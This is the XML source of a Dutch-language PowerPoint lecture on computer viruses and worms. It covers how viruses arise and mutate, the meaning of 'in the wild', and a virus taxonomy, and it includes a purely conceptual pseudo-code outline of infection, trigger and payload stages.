            <a:ext cx="5366657" cy="416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03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81800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Hoe virussen worden gemaakt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86800" cy="4999038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Soms opzichzelf: bestaand virus kan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>muteren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> zonder dat het de oorspronkelijke bedoeling was</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Macrovirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> (macro’s – MS Office) bestaat dikwijls uit een aantal modules </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>bij de replicatie kan het soms voorvallen dat er enkele modules niet worden gekopieerd </a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="à"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>soms compleet ander virus, andere werking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Vroeger werden de meeste virussen geschreven in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>machine- of assembleertaal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> -&gt; was veel kennis voor nodig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Nu: geschreven op </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hogere programmeertalen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>(C, C++,VBA, Delphi,...), dus al niet meer zo moeilijk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Schijfruimte en werkgeheugen zijn redelijk goedkoop geworden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Een overdreven groot bestand valt niet meer zo hard op als vroeger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Er bestaan zelfs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kits die automatisch virussen genereren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Leven niet lang, gemakkelijk om ze generisch te detecteren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Hebben meestal toch dezelfde ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>familietrekjes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Generatoren dragen dus bij aan het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>glut-probleem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> (aantal virussen), niet zo zeer aan het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘in the wild’-probleem</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19458" name="Picture 2" descr="http://melissavirus.com/images/howmelissaworks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31"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7523170" y="0"/>
            <a:ext cx="1620829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Rechte verbindingslijn met pijl 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2209800" y="990600"/>
            <a:ext cx="531337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77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 betekent ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in the wild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>’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BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In the wild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>: als een virus is ontsnapt of vrijgegeven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Als het grote publiek er dus mee te maken krijgt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>niet de onderzoekers (naar virusdetectiesystemen) in de afgesloten labo’s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>WildList Organisation (WLO):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> lijst bijhouden van virussen die momenteel circuleren ‘in the wild’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Viruspro’s melden aan de organisatie hoe dikwijls ze een bepaald virus tegenkomen in een bepaalde periode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>-&gt; daarmee wordt de lijst opgesteld</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t># virussen in the wild = +- paar honderd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t># virussen dat bestaat = 70 000 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4668560"/>
            <a:ext cx="3124200" cy="2189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9552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426"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Hoe virussen werken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638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>seudo-code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Begin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resident</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)   // in RAM nestelen zodat je aan replicatie kan gaan doen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>If(het te infecteren object bestaat)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If(object nog niet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>geinfecteerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>)	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(INFECTION)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Then (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>infecteer object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Endif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Endif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If(ontstekingsvoorwaarde bestaat)     	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(TRIGGER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voer springlading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>uit		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(PAYLOAD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Endif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>End</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" sz="2900" dirty="0" smtClean="0"/>
              <a:t>Virussen kunnen meestal ingedeeld worden in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sz="2500" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Boot sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="2500" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>infectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="2500" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (BSI)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sz="2500" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virussen die een bestand infecteren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sz="2500" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multivirussen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sz="2500" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Macrovirussen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sz="2500" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scriptvirussen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sz="2500" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memetische virussen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sz="2500" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(wormen)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="25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45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1173</TotalTime>
  <Words>1414</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Diavoorstelling (4:3)</PresentationFormat>
  <Paragraphs>192</Paragraphs>
  <Slides>24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Kantoorthema</vt:lpstr>
      <vt:lpstr>2. Virussen en wormen</vt:lpstr>
      <vt:lpstr>Wat is een computervirus?</vt:lpstr>
      <vt:lpstr>PowerPoint-presentatie</vt:lpstr>
      <vt:lpstr>Wat is een computerworm?</vt:lpstr>
      <vt:lpstr>PowerPoint-presentatie</vt:lpstr>
      <vt:lpstr>Meestal cross tussen virus en worm</vt:lpstr>
      <vt:lpstr>Hoe virussen worden gemaakt</vt:lpstr>
      <vt:lpstr>Wat betekent ‘in the wild’</vt:lpstr>
      <vt:lpstr>Hoe virussen werken</vt:lpstr>
      <vt:lpstr>Een voorbeeld ‘I love you’-virus</vt:lpstr>
      <vt:lpstr>PowerPoint-presentatie</vt:lpstr>
      <vt:lpstr>1. Boot sector infectors (BSI)</vt:lpstr>
      <vt:lpstr>Boot Sector Infector (BSI)</vt:lpstr>
      <vt:lpstr>Boot Sector Infector (BSI)</vt:lpstr>
      <vt:lpstr>2. Virussen die bestanden infecteren</vt:lpstr>
      <vt:lpstr>3. Multivirussen</vt:lpstr>
      <vt:lpstr>4. Macrovirussen</vt:lpstr>
      <vt:lpstr>5. Scriptvirussen</vt:lpstr>
      <vt:lpstr>6. Memetische virussen</vt:lpstr>
      <vt:lpstr>PowerPoint-presentatie</vt:lpstr>
      <vt:lpstr>Viruskenmerken (!)</vt:lpstr>
      <vt:lpstr>Viruskenmerken</vt:lpstr>
      <vt:lpstr>PowerPoint-presentatie</vt:lpstr>
      <vt:lpstr>Virus life cycle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Firewalls</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy>Bram Heyns</cp:lastModifiedBy>
  <cp:revision>56</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-16T11:56:21Z</dcterms:modified>
</cp:coreProperties>
</file>